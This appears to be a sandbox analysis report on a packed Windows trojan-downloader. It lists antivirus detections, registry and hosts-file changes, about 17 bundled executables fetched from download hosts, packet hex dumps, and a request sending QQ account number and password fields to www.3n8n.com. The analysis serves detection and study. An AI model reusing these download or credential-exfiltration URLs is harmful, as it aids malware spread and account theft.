Analysis Date2014-11-22 06:09:44
MD563e64838a49a23e3de2d82b7bd59a8a6
SHA189f502a624c51ebf6d4b6dad3d43c37bf1b0387b

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
SectionUPX0 md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
SectionUPX1 md5: 8d998c62285631a7fb14d3b1ac99c585 sha1: 900db9d142bf0ef689d987d33e36336dd09c7c7e size: 217600
SectionUPX2 md5: bf7aef12f9ab1a21aa165814ad5b2dfb sha1: 1a7f55a28c06d9f01f4bd884ffbffeeef6d83fa7 size: 1024
Timestamp2014-10-14 02:06:57
PackerUPX -> www.upx.sourceforge.net
PEhashdff82cfb0296a611589f5b80c5979cb6bdecb77c
IMPhash12949835d0cda9d5836fa2fbd6c55e3c
AV360 SafeGen:Variant.Symmi.42740
AVAd-AwareGen:Variant.Symmi.42740
AVAlwil (avast)Malware-gen:Win32:Malware-gen
AVArcabit (arcavir)no_virus
AVAuthentiumW32/Trojan.UZRS-1995
AVAvira (antivir)TR/Dldr.Agent.219648.3
AVBullGuardGen:Variant.Symmi.42740
AVCA (E-Trust Ino)Win32/Oflwr.A!crypt
AVCAT (quickheal)no_virus
AVClamAVno_virus
AVDr. Webno_virus
AVEmsisoftGen:Variant.Symmi.42740
AVEset (nod32)Win32/Agent.WCF
AVFortinetW32/Agent.WCF!tr
AVFrisk (f-prot)no_virus
AVF-SecureGen:Variant.Symmi.42740
AVGrisoft (avg)Agent5.BIT
AVIkarusTrojan.Win32.Agent
AVK7Trojan ( 0049c9161 )
AVKasperskyTrojan-Downloader.Win32.Generic:Trojan.Win32.Hosts2.gen
AVMalwareBytesno_virus
AVMcafeeRDN/Generic.dx!dgq
AVMicrosoft Security Essentialsno_virus
AVMicroWorld (escan)Gen:Variant.Symmi.42740
AVRisingno_virus
AVSophosno_virus
AVSymantecno_virus
AVTrend Microno_virus
AVVirusBlokAda (vba32)no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page ➝
http://www.2345.com/?kkkkkkkk2345\\x00
RegistryHKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage ➝
NULL
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue ➝
NULL
Creates FileC:\WINDOWS\system32\drivers\etc\hosts
Creates FileC:\Program Files\Common Files\Microsoft Shared\p3_kbaidu888888_jg04OunlF483lZatm6Ir5_v14.7.1.exe
Creates FileC:\Program Files\Common Files\tqrl_97_1957.exe
Creates FileC:\Program Files\Common Files\xtsszs_mt4.exe
Creates FileC:\Program Files\Common Files\YoudaoDict_silent3.exe
Creates FileC:\Program Files\Common Files\OfficeAssist.0195.80.1054.exe
Creates FileC:\Program Files\Common Files\kt_b_80213.exe
Creates FileC:\Program Files\Common Files\qhse_7654_5943.jpg
Creates FileC:\Program Files\Common Files\jgimeside_yllm_12359.exe
Creates FileC:\Program Files\Common Files\setup_t10303.exe
Creates FileC:\Program Files\Common Files\setup_s1020.exe
Creates FileC:\Program Files\Common Files\asdqw_3104-48740.JPG
Creates FileC:\WINDOWS\system32\unrar.dll
Creates FileC:\Program Files\Common Files\b5t_setup_s093.exe
Creates FileC:\Program Files\Common Files\bdsd.jpg
Creates FileC:\Program Files\Common Files\appers_7_1958.exe
Creates FileC:\Program Files\Common Files\shanhu_7654_356.jpg
Creates FileC:\Program Files\Common Files\365weatherIns_257.exe
Deletes FileC:\Program Files\Common Files\qhse_7654_5943.jpg
Deletes FileC:\Program Files\Common Files\bdsd.jpg
Deletes FileC:\Program Files\Common Files\Microsoft Shared\p3_kbaidu888888_jg04OunlF483lZatm6Ir5_v14.7.1.exe
Winsock URLhttp://dl.b5m.cn/marketing/b5t_setup_s093.exe
Winsock URLhttp://jifendownload.2345.cn/jifen_2345/p3_kbaidu888888_jg04OunlF483lZatm6Ir5_v14.7.1.exe
Winsock URLhttp://d3.freep.cn/3tb_140923192942q71f538987.jpg
Winsock URLhttp://cdn.pcbeta.attachment.inimc.com/data/attachment/forum/201409/12/173937imav9yvcycn3akua.jpg
Winsock URLhttp://codown.youdao.com/cidian/YoudaoDict_silent3.exe
Winsock URLhttp://xz.dianxinshu.com/download/setup_s1020.exe
Winsock URLhttp://d3.freep.cn/3tb_140917191931o0a2538987.jpg
Winsock URLhttp://down.9vh.net/appers_7_1958.exe
Winsock URLhttp://d3.freep.cn/3tb_141007222757xfui539918.jpg
Winsock URLhttp://xtsszs.oss-cn-hangzhou.aliyuncs.com/xtsszs_mt4.exe
Winsock URLhttp://down.qunasou.com/kt/kt_b_80213.exe
Winsock URLhttp://wdl1.cache.wps.cn/wps/download/OfficeAssist.0195.80.1054.exe
Winsock URLhttp://down.xiaoxinrili.com/hezi/jm/setup_t10303.exe
Winsock URLhttp://down.waisong8.com/input/jgimeside_yllm_12359.exe
Winsock URLhttp://www.3n8n.com/xin8/mail.asp?qqnumber=&qqpassword= 6
Winsock URLhttp://down.95kd.com/update/365/365weatherIns_257.exe
Winsock URLhttp://down.tianyunxj.com/tqrl_97_1957.exe

Network Details:

DNSwebmirror.pcbeta.com
Type: A
113.107.42.25
DNSdown.9vh.net
Type: A
222.186.60.3
DNSdown.waisong8.com
Type: A
218.75.110.13
DNSgnop012.tlgslb.com
Type: A
125.78.248.73
DNSgnop012.tlgslb.com
Type: A
125.78.248.74
DNSgnop012.tlgslb.com
Type: A
27.152.191.39
DNSc06.i06.arnic.hadns.net
Type: A
183.57.148.246
DNSc06.i06.arnic.hadns.net
Type: A
183.61.10.249
DNSdown.95kd.com
Type: A
122.225.100.200
DNSxtsszs.oss-cn-hangzhou.aliyuncs.com
Type: A
42.120.230.9
DNS360.band.glb0.ldcache.net
Type: A
202.97.174.82
DNS360.band.glb0.ldcache.net
Type: A
183.61.19.168
DNSbgp5.yandui.com
Type: A
222.186.60.10
DNSbgp5.yandui.com
Type: A
222.186.60.11
DNSbgp5.yandui.com
Type: A
60.222.232.216
DNSopt.dl.glb0.lxdns.com
Type: A
70.39.191.87
DNSbgp5.yandui.com
Type: A
60.222.232.216
DNSbgp5.yandui.com
Type: A
222.186.60.10
DNSbgp5.yandui.com
Type: A
222.186.60.11
DNSdownload012.rdb.cnc.ccgslb.com.cn
Type: A
61.179.105.148
DNSdownload012.rdb.cnc.ccgslb.com.cn
Type: A
221.194.130.10
DNSimg.freep.cn
Type: A
221.234.36.167
DNSimg.freep.cn
Type: A
221.234.36.242
DNSdownload.2345.com
Type: A
60.191.223.15
DNSdownload.2345.com
Type: A
61.147.127.202
DNSdownload.2345.com
Type: A
61.147.127.203
DNSdownload.2345.com
Type: A
61.160.245.8
DNSdownload.2345.com
Type: A
61.160.245.11
DNSdownload.2345.com
Type: A
61.160.245.14
DNSdownload.2345.com
Type: A
122.228.248.3
DNSdownload.2345.com
Type: A
218.75.155.244
DNSdownload.2345.com
Type: A
60.191.187.15
DNSdownload.2345.com
Type: A
60.191.223.2
DNSdownload.2345.com
Type: A
60.191.223.4
DNSwww.3n8n.com
Type: A
118.193.155.117
DNScdn.pcbeta.attachment.inimc.com
Type: A
DNSdl.b5m.cn
Type: A
DNSdown.tianyunxj.com
Type: A
DNSdown.xiaoxinrili.com
Type: A
DNSxz.dianxinshu.com
Type: A
DNScodown.youdao.com
Type: A
DNSdown.qunasou.com
Type: A
DNSwdl1.cache.wps.cn
Type: A
DNSd3.freep.cn
Type: A
DNSjifendownload.2345.cn
Type: A
HTTP GEThttp://cdn.pcbeta.attachment.inimc.com/data/attachment/forum/201409/12/173937imav9yvcycn3akua.jpg
User-Agent:
HTTP GEThttp://down.9vh.net/appers_7_1958.exe
User-Agent:
HTTP GEThttp://down.waisong8.com/input/jgimeside_yllm_12359.exe
User-Agent:
HTTP GEThttp://dl.b5m.cn/marketing/b5t_setup_s093.exe
User-Agent:
HTTP GEThttp://down.tianyunxj.com/tqrl_97_1957.exe
User-Agent:
HTTP GEThttp://down.95kd.com/update/365/365weatherIns_257.exe
User-Agent:
HTTP GEThttp://xtsszs.oss-cn-hangzhou.aliyuncs.com/xtsszs_mt4.exe
User-Agent:
HTTP GEThttp://down.xiaoxinrili.com/hezi/jm/setup_t10303.exe
User-Agent:
HTTP GEThttp://xz.dianxinshu.com/download/setup_s1020.exe
User-Agent:
HTTP GEThttp://codown.youdao.com/cidian/YoudaoDict_silent3.exe
User-Agent:
HTTP GEThttp://down.qunasou.com/kt/kt_b_80213.exe
User-Agent:
HTTP GEThttp://wdl1.cache.wps.cn/wps/download/OfficeAssist.0195.80.1054.exe
User-Agent:
HTTP GEThttp://d3.freep.cn/3tb_140923192942q71f538987.jpg
User-Agent:
HTTP GEThttp://d3.freep.cn/3tb_141007222757xfui539918.jpg
User-Agent:
HTTP GEThttp://jifendownload.2345.cn/jifen_2345/p3_kbaidu888888_jg04OunlF483lZatm6Ir5_v14.7.1.exe
User-Agent:
HTTP GEThttp://d3.freep.cn/3tb_140917191931o0a2538987.jpg
User-Agent:
HTTP GEThttp://www.3n8n.com/xin8/mail.asp?qqnumber=&qqpassword=%20%206
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Flows TCP192.168.1.1:1031 ➝ 113.107.42.25:80
Flows TCP192.168.1.1:1032 ➝ 222.186.60.3:80
Flows TCP192.168.1.1:1033 ➝ 218.75.110.13:80
Flows TCP192.168.1.1:1034 ➝ 125.78.248.73:80
Flows TCP192.168.1.1:1035 ➝ 183.57.148.246:80
Flows TCP192.168.1.1:1036 ➝ 122.225.100.200:80
Flows TCP192.168.1.1:1037 ➝ 42.120.230.9:80
Flows TCP192.168.1.1:1038 ➝ 202.97.174.82:80
Flows TCP192.168.1.1:1039 ➝ 222.186.60.10:80
Flows TCP192.168.1.1:1040 ➝ 70.39.191.87:80
Flows TCP192.168.1.1:1041 ➝ 60.222.232.216:80
Flows TCP192.168.1.1:1042 ➝ 61.179.105.148:80
Flows TCP192.168.1.1:1043 ➝ 221.234.36.167:80
Flows TCP192.168.1.1:1044 ➝ 221.234.36.167:80
Flows TCP192.168.1.1:1045 ➝ 60.191.223.15:80
Flows TCP192.168.1.1:1046 ➝ 221.234.36.167:80
Flows TCP192.168.1.1:1047 ➝ 118.193.155.117:80

Raw Pcap
0x00000000 (00000)   47455420 2f646174 612f6174 74616368   GET /data/attach
0x00000010 (00016)   6d656e74 2f666f72 756d2f32 30313430   ment/forum/20140
0x00000020 (00032)   392f3132 2f313733 39333769 6d617639   9/12/173937imav9
0x00000030 (00048)   79766379 636e3361 6b75612e 6a706720   yvcycn3akua.jpg 
0x00000040 (00064)   48545450 2f312e31 0d0a486f 73743a20   HTTP/1.1..Host: 
0x00000050 (00080)   63646e2e 70636265 74612e61 74746163   cdn.pcbeta.attac
0x00000060 (00096)   686d656e 742e696e 696d632e 636f6d0d   hment.inimc.com.
0x00000070 (00112)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x00000080 (00128)   6e6f2d63 61636865 0d0a0d0a            no-cache....

0x00000000 (00000)   47455420 2f617070 6572735f 375f3139   GET /appers_7_19
0x00000010 (00016)   35382e65 78652048 5454502f 312e310d   58.exe HTTP/1.1.
0x00000020 (00032)   0a486f73 743a2064 6f776e2e 3976682e   .Host: down.9vh.
0x00000030 (00048)   6e65740d 0a436163 68652d43 6f6e7472   net..Cache-Contr
0x00000040 (00064)   6f6c3a20 6e6f2d63 61636865 0d0a0d0a   ol: no-cache....
0x00000050 (00080)   63646e2e 70636265 74612e61 74746163   cdn.pcbeta.attac
0x00000060 (00096)   686d656e 742e696e 696d632e 636f6d0d   hment.inimc.com.
0x00000070 (00112)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x00000080 (00128)   6e6f2d63 61636865 0d0a0d0a            no-cache....

0x00000000 (00000)   47455420 2f696e70 75742f6a 67696d65   GET /input/jgime
0x00000010 (00016)   73696465 5f796c6c 6d5f3132 3335392e   side_yllm_12359.
0x00000020 (00032)   65786520 48545450 2f312e31 0d0a486f   exe HTTP/1.1..Ho
0x00000030 (00048)   73743a20 646f776e 2e776169 736f6e67   st: down.waisong
0x00000040 (00064)   382e636f 6d0d0a43 61636865 2d436f6e   8.com..Cache-Con
0x00000050 (00080)   74726f6c 3a206e6f 2d636163 68650d0a   trol: no-cache..
0x00000060 (00096)   0d0a656e 742e696e 696d632e 636f6d0d   ..ent.inimc.com.
0x00000070 (00112)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x00000080 (00128)   6e6f2d63 61636865 0d0a0d0a            no-cache....

0x00000000 (00000)   47455420 2f6d6172 6b657469 6e672f62   GET /marketing/b
0x00000010 (00016)   35745f73 65747570 5f733039 332e6578   5t_setup_s093.ex
0x00000020 (00032)   65204854 54502f31 2e310d0a 486f7374   e HTTP/1.1..Host
0x00000030 (00048)   3a20646c 2e62356d 2e636e0d 0a436163   : dl.b5m.cn..Cac
0x00000040 (00064)   68652d43 6f6e7472 6f6c3a20 6e6f2d63   he-Control: no-c
0x00000050 (00080)   61636865 0d0a0d0a 2d636163 68650d0a   ache....-cache..
0x00000060 (00096)   0d0a656e 742e696e 696d632e 636f6d0d   ..ent.inimc.com.
0x00000070 (00112)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x00000080 (00128)   6e6f2d63 61636865 0d0a0d0a            no-cache....

0x00000000 (00000)   47455420 2f747172 6c5f3937 5f313935   GET /tqrl_97_195
0x00000010 (00016)   372e6578 65204854 54502f31 2e310d0a   7.exe HTTP/1.1..
0x00000020 (00032)   486f7374 3a20646f 776e2e74 69616e79   Host: down.tiany
0x00000030 (00048)   756e786a 2e636f6d 0d0a4361 6368652d   unxj.com..Cache-
0x00000040 (00064)   436f6e74 726f6c3a 206e6f2d 63616368   Control: no-cach
0x00000050 (00080)   650d0a0d 0a0a0d0a 2d636163 68650d0a   e.......-cache..
0x00000060 (00096)   0d0a656e 742e696e 696d632e 636f6d0d   ..ent.inimc.com.
0x00000070 (00112)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x00000080 (00128)   6e6f2d63 61636865 0d0a0d0a            no-cache....

0x00000000 (00000)   47455420 2f757064 6174652f 3336352f   GET /update/365/
0x00000010 (00016)   33363577 65617468 6572496e 735f3235   365weatherIns_25
0x00000020 (00032)   372e6578 65204854 54502f31 2e310d0a   7.exe HTTP/1.1..
0x00000030 (00048)   486f7374 3a20646f 776e2e39 356b642e   Host: down.95kd.
0x00000040 (00064)   636f6d0d 0a436163 68652d43 6f6e7472   com..Cache-Contr
0x00000050 (00080)   6f6c3a20 6e6f2d63 61636865 0d0a0d0a   ol: no-cache....
0x00000060 (00096)   0d0a656e 742e696e 696d632e 636f6d0d   ..ent.inimc.com.
0x00000070 (00112)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x00000080 (00128)   6e6f2d63 61636865 0d0a0d0a            no-cache....

0x00000000 (00000)   47455420 2f787473 737a735f 6d74342e   GET /xtsszs_mt4.
0x00000010 (00016)   65786520 48545450 2f312e31 0d0a486f   exe HTTP/1.1..Ho
0x00000020 (00032)   73743a20 78747373 7a732e6f 73732d63   st: xtsszs.oss-c
0x00000030 (00048)   6e2d6861 6e677a68 6f752e61 6c697975   n-hangzhou.aliyu
0x00000040 (00064)   6e63732e 636f6d0d 0a436163 68652d43   ncs.com..Cache-C
0x00000050 (00080)   6f6e7472 6f6c3a20 6e6f2d63 61636865   ontrol: no-cache
0x00000060 (00096)   0d0a0d0a 742e696e 696d632e 636f6d0d   ....t.inimc.com.
0x00000070 (00112)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x00000080 (00128)   6e6f2d63 61636865 0d0a0d0a            no-cache....

0x00000000 (00000)   47455420 2f68657a 692f6a6d 2f736574   GET /hezi/jm/set
0x00000010 (00016)   75705f74 31303330 332e6578 65204854   up_t10303.exe HT
0x00000020 (00032)   54502f31 2e310d0a 486f7374 3a20646f   TP/1.1..Host: do
0x00000030 (00048)   776e2e78 69616f78 696e7269 6c692e63   wn.xiaoxinrili.c
0x00000040 (00064)   6f6d0d0a 43616368 652d436f 6e74726f   om..Cache-Contro
0x00000050 (00080)   6c3a206e 6f2d6361 6368650d 0a0d0a65   l: no-cache....e
0x00000060 (00096)   0d0a0d0a 742e696e 696d632e 636f6d0d   ....t.inimc.com.
0x00000070 (00112)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x00000080 (00128)   6e6f2d63 61636865 0d0a0d0a            no-cache....

0x00000000 (00000)   47455420 2f646f77 6e6c6f61 642f7365   GET /download/se
0x00000010 (00016)   7475705f 73313032 302e6578 65204854   tup_s1020.exe HT
0x00000020 (00032)   54502f31 2e310d0a 486f7374 3a20787a   TP/1.1..Host: xz
0x00000030 (00048)   2e646961 6e78696e 7368752e 636f6d0d   .dianxinshu.com.
0x00000040 (00064)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x00000050 (00080)   6e6f2d63 61636865 0d0a0d0a 0a0d0a65   no-cache.......e
0x00000060 (00096)   0d0a0d0a 742e696e 696d632e 636f6d0d   ....t.inimc.com.
0x00000070 (00112)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x00000080 (00128)   6e6f2d63 61636865 0d0a0d0a            no-cache....

0x00000000 (00000)   47455420 2f636964 69616e2f 596f7564   GET /cidian/Youd
0x00000010 (00016)   616f4469 63745f73 696c656e 74332e65   aoDict_silent3.e
0x00000020 (00032)   78652048 5454502f 312e310d 0a486f73   xe HTTP/1.1..Hos
0x00000030 (00048)   743a2063 6f646f77 6e2e796f 7564616f   t: codown.youdao
0x00000040 (00064)   2e636f6d 0d0a4361 6368652d 436f6e74   .com..Cache-Cont
0x00000050 (00080)   726f6c3a 206e6f2d 63616368 650d0a0d   rol: no-cache...
0x00000060 (00096)   0a0a0d0a 742e696e 696d632e 636f6d0d   ....t.inimc.com.
0x00000070 (00112)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x00000080 (00128)   6e6f2d63 61636865 0d0a0d0a            no-cache....

0x00000000 (00000)   47455420 2f6b742f 6b745f62 5f383032   GET /kt/kt_b_802
0x00000010 (00016)   31332e65 78652048 5454502f 312e310d   13.exe HTTP/1.1.
0x00000020 (00032)   0a486f73 743a2064 6f776e2e 71756e61   .Host: down.quna
0x00000030 (00048)   736f752e 636f6d0d 0a436163 68652d43   sou.com..Cache-C
0x00000040 (00064)   6f6e7472 6f6c3a20 6e6f2d63 61636865   ontrol: no-cache
0x00000050 (00080)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f777073 2f646f77 6e6c6f61   GET /wps/downloa
0x00000010 (00016)   642f4f66 66696365 41737369 73742e30   d/OfficeAssist.0
0x00000020 (00032)   3139352e 38302e31 3035342e 65786520   195.80.1054.exe 
0x00000030 (00048)   48545450 2f312e31 0d0a486f 73743a20   HTTP/1.1..Host: 
0x00000040 (00064)   77646c31 2e636163 68652e77 70732e63   wdl1.cache.wps.c
0x00000050 (00080)   6e0d0a43 61636865 2d436f6e 74726f6c   n..Cache-Control
0x00000060 (00096)   3a206e6f 2d636163 68650d0a 0d0a       : no-cache....

0x00000000 (00000)   47455420 2f337462 5f313430 39323331   GET /3tb_1409231
0x00000010 (00016)   39323934 32713731 66353338 3938372e   92942q71f538987.
0x00000020 (00032)   6a706720 48545450 2f312e31 0d0a486f   jpg HTTP/1.1..Ho
0x00000030 (00048)   73743a20 64332e66 72656570 2e636e0d   st: d3.freep.cn.
0x00000040 (00064)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x00000050 (00080)   6e6f2d63 61636865 0d0a0d0a 74726f6c   no-cache....trol
0x00000060 (00096)   3a206e6f 2d636163 68650d0a 0d0a       : no-cache....

0x00000000 (00000)   47455420 2f337462 5f313431 30303732   GET /3tb_1410072
0x00000010 (00016)   32323735 37786675 69353339 3931382e   22757xfui539918.
0x00000020 (00032)   6a706720 48545450 2f312e31 0d0a486f   jpg HTTP/1.1..Ho
0x00000030 (00048)   73743a20 64332e66 72656570 2e636e0d   st: d3.freep.cn.
0x00000040 (00064)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x00000050 (00080)   6e6f2d63 61636865 0d0a0d0a 74726f6c   no-cache....trol
0x00000060 (00096)   3a206e6f 2d636163 68650d0a 0d0a       : no-cache....

0x00000000 (00000)   47455420 2f6a6966 656e5f32 3334352f   GET /jifen_2345/
0x00000010 (00016)   70335f6b 62616964 75383838 3838385f   p3_kbaidu888888_
0x00000020 (00032)   6a673034 4f756e6c 46343833 6c5a6174   jg04OunlF483lZat
0x00000030 (00048)   6d364972 355f7631 342e372e 312e6578   m6Ir5_v14.7.1.ex
0x00000040 (00064)   65204854 54502f31 2e310d0a 486f7374   e HTTP/1.1..Host
0x00000050 (00080)   3a206a69 66656e64 6f776e6c 6f61642e   : jifendownload.
0x00000060 (00096)   32333435 2e636e0d 0a436163 68652d43   2345.cn..Cache-C
0x00000070 (00112)   6f6e7472 6f6c3a20 6e6f2d63 61636865   ontrol: no-cache
0x00000080 (00128)   0d0a0d0a 61636865 2085c6              ....ache ..

0x00000000 (00000)   47455420 2f337462 5f313430 39313731   GET /3tb_1409171
0x00000010 (00016)   39313933 316f3061 32353338 3938372e   91931o0a2538987.
0x00000020 (00032)   6a706720 48545450 2f312e31 0d0a486f   jpg HTTP/1.1..Ho
0x00000030 (00048)   73743a20 64332e66 72656570 2e636e0d   st: d3.freep.cn.
0x00000040 (00064)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x00000050 (00080)   6e6f2d63 61636865 0d0a0d0a 6f61642e   no-cache....oad.
0x00000060 (00096)   32333435 2e636e0d 0a436163 68652d43   2345.cn..Cache-C
0x00000070 (00112)   6f6e7472 6f6c3a20 6e6f2d63 61636865   ontrol: no-cache
0x00000080 (00128)   0d0a0d0a 61636865 2085c6              ....ache ..

0x00000000 (00000)   47455420 2f78696e 382f6d61 696c2e61   GET /xin8/mail.a
0x00000010 (00016)   73703f71 716e756d 6265723d 26717170   sp?qqnumber=&qqp
0x00000020 (00032)   61737377 6f72643d 25323025 32303620   assword=%20%206 
0x00000030 (00048)   48545450 2f312e31 0d0a5573 65722d41   HTTP/1.1..User-A
0x00000040 (00064)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000050 (00080)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000060 (00096)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000070 (00112)   204e5420 352e313b 20535631 290d0a48    NT 5.1; SV1)..H
0x00000080 (00128)   6f73743a 20777777 2e336e38 6e2e636f   ost: www.3n8n.co
0x00000090 (00144)   6d0d0a43 61636865 2d436f6e 74726f6c   m..Cache-Control
0x000000a0 (00160)   3a206e6f 2d636163 68650d0a 0d0a       : no-cache....


Strings
.
t
.F4
.
.0
S.P/..
..$
.
.
.J.
.
...C`....
.
(
+;..
....u
..3
{.|.2..
..
}u
.
t
.F4
.
.0
S.P/..
..$
.
.
.J.
.
...C`....
.
(
+;..
....u
..3
{.|.2..
..
}u

>	>">.
 !"#$%&'()*+,-./
0 0&0,02
010:0G0S0g0m0
02*<>|"
;,0,271O
 (08@P`p
<09?EI
0B=`[!
0/b/{V
0GHUy5
<0<N`p
 0@P`jg
0s32fta	l
;1;?;{;
\`1!+_"&
1 1$1(Pt
1%1B1U1^1
@1`1d>
129z&\l
\16?[B
170u >moi
1c8g8k8o8s8w8{
1g@=+#.
	1i7DFl
<*>1>j>q
1#QNAN
1RP-t,&
1v1z1~1
1W} 4Z
2(252;2O2
2275622D8D
?*?.?2?6?:
,'2ew0
/+2P0Z39
2~q5Ww
32\taskmgr.exe
3$3(3H
35138b9
:(>->3>8>Y>w>
.$~3e-I
3[M<'%
3V0Y1M
]41tR6.
4511da95:8642fc
45OOBg
465p5X7
4,84<4\4`4d
4C:3FS
4$,C4Q4a4p4
4\<`<d<hg
$,4<DW
4~f9.u
4!fbDK
&4FTbpy
4IJKLMNO
/4s\Blu
4y2rr8c
\+50vi(8PX
517xky.we(d7
5(54~H5h5t5
56a(kC
"57-1546-4
[5A#dH
(5I`^O
5kE53&HV
5x0lVblv)
	5Yn8(XfF-.nns
60-m9	|{
647X7`
6!6(6/6N6U6\6c6
6,686<
6/\6.8l
673E|7
6"7-7Q
6789abcdef
:6dxINM|[F
6~=	F%
6GH&$J
6k>o>s
6L(:2D
6<o"IlX
	6P`XL
^+6/S)
6TJ)p;T
\\(6@"V
!6WjaPgfO
<6Z2ea7be1
7$:(:,
70K0_R
>7,2(eh
"7365we
73937Zav9yvcycn3aku
75f06e
77>7E7L
)77=Ano
7/7Sr"818;9X9
7)8j<A=X=u=
7=_B'9
7DWORD4A
7/Format
7*gic_
7K8\8j8
,&80$	S
8273I3
^,(8	7
8740.JPG_c
8"8(8.848:ZF
88**P{O
-8au'ru!
8B0 4`
<8C8J8Q8X8_8f8
#{8+{d,
8d(:2,
8f494a2afdb0c
&8-Fk*
 8G120
(8l@03
8lK`E@
8T) L#
#8UP*$J
`@8VfB
`8Z8d8
900FB7
91yG	f3
/930,H
942q71f
959@9y9
96>NH9NvZ
98:T:\:d:u:
\=9!~a
9h</2$
9hP1i	
9`:i:r:~:
="=9=J=
9J:n:t:z:
9^m>tR;
9r<h$x
+9w,)G
(>$+`A)
A!3;WF
a-5d9fbd-8
aAn!EH
AB9,Mf
@/:;<=>?@ABCDEH
@ACL@TM
A,dlM}
?ADVAPI
ADVAPI32.dll
a_e?Fl
_AFX_j_ST
AfxOldhProc
ais#"T
and Object
AndSZ`
Ao8l\0YG
ap$<pN
AQ)-*5A
a*"R9E
Array<char>
?AtCA#
ATL.DLL
>Augu"
a "UoP(
Auto=1
:AvD1(
!A'WClose
b736Dek
B8tXLHX
bad_a2v<Dia
B&bTj&r.
**BCCxh1
b.fdf4a
B=FFX.
BfJcG #
?B?F?J?N?R?V?Z?^?b
B:% |g<5
bh%H:%M
BitBlt
:B>n9B
BONZS8_
&^bP\n
brf2w!*
bR@<@u
b'ruH&
Buff#Uppw
(b,VPA
BWideC
BWjRW4Q
c4 f	f
c9d"MA
"(C` A 
CCONOUT$K}
c-*dGpa-
C<.^E!
CKAun!Xh
ClosePrinter
 (/clr)
c*m>r[sK6l
cn/bbs
COMCTL32.dll
CPgR/S
CPPZbugHo
cripth.
'*CSh,_
c>shg(yg:
`?~CTv
CValue
CWinApp
	# D`$`
d1.0">
D3>x:B
&(d480
D7m7y7
`D8l2	
+Dbf[t
DBu.hX3
dc71cb684l2cl
D(CR^2
dd1*23
dddA=r
d\Fold
>>+DHr
d(i*B"
D~j2H"
d $$L!
@DOLEPRO
dqw_3b4-4"
{'	D R<
D#r$\0tx
DragFinish
dsL&bJ
=dTF-k
dvuklnW
)dxu2Z
e+0Ow?
e1pU4P
E4SCQD
<E`7Vyl
^(EcWl
))EE	F
*,E}|H
~ejtaJ! D
Elehmd
E,n_$L`f
EnumDisplay/
?E/PreviewPages
Er(2/^
E\SOFTWAR
ES_ROOT
euoGetM i
e>X86"l
ExitProcess
\Expl'
\E|"*Z
Ez9f9l9r9z9
f1dfBl
f1D?y_
f1r3|3v3
"f##3%
f3o^X*5
f5A'OR
f7j7w7
F+	-8+
f9]8	f
f/9F=v
f9vh.p/J
@ F@AO
faultI0nB,%7
=:FazpiW0gS
Fd2h7xfui:(
Fe$1CU
f:EP_3bE
F[_`_g
FhuWXw
{Fh@:w
F$IGQ'
?f?j?n?r?v?z?~?
FKl\3H
\\f,l` h
FL$'Wq
fmo_hy
fMt.B2
F,tv(V
f,(>(V
>Fx\?!pP
=f;*YN
]fzhWfv
<+*G|&
G)0+X)x
,G94952
ga5kdQ$
GbwOlgI`:
[	gC(^
GDI32.dll
ge58=4f
#ge[RXo%nm4i
GetProcAddress
Gh5M p
GL\7j[
GLEhPjBx(
__GLOBAL_HEAP_SELECTED
Gm.Gpu
go!+Bt
G*pk@i<
G*Rb.	]d
"gtDM5.
guo5	U
 gYjX,>|m
>H^0-:R0
	h595b64144cc{6
h6l Dlg
H6&y934
H79; )
H"eew@
H;er 8^
;HFZip
hGm?;fi
H{`iB'o
HKEY_LOC
"(>H>L>l>p>
H`M~lPPM
H:mm:ss>
<hp6#]
H)?p|Hk
[[hrQWA
HSq"=B
hTL*.DLL
HTP;c |R
?(?H?T?X?h?
Hu?15F
,[(hwsb.
hxAYT+
HXtB+<9
HxZKU>/
\HZ,$%
.<Hz0^
HZ\R4l1
:/I2wF
>IAgJ~
IaT<YS
IBck_/N
ibL4s0
IEr?	jI)E
ijr\Adv
iLgju}M
InternetOpenA
io6rd7C
#iP+"5P"
+IQS(Iq2
I_RH'1
IS8zht	@o._Y
 @ise,rp
I~%:u~ 
{Iw:=,
J.2url$
$	j=81
JAd0Y8X
japoO7notz+
j@D{Af
_jg04Ou\F483lZatm6Ir5_v
Jg*DX1B
Jh0ww!
;j`h8N
:	jHq)^
JKm>*M
^J@][N
$jn:9w
jO57OO[
J:Pu\D
'juHaYd*
\J#!V0n
j.W)uQ
JYz?r<<>>\
K(7u[Pv
(kA!Bm
KbCryptKeyCacheI
K"@d|%E"F
K;`eh %
\@KERN
KERNEL32.DLL
Kk)+Y)
;k=o=s=w
k$q(F#
	kqj0Kl
k Sourc
K$T:a*s>z(A
kUv	z`
/ kW	/
K\w0	j
k+w'-n
;#<l<-<=<]
l5vP'5
L6d6h6
L8.m~?
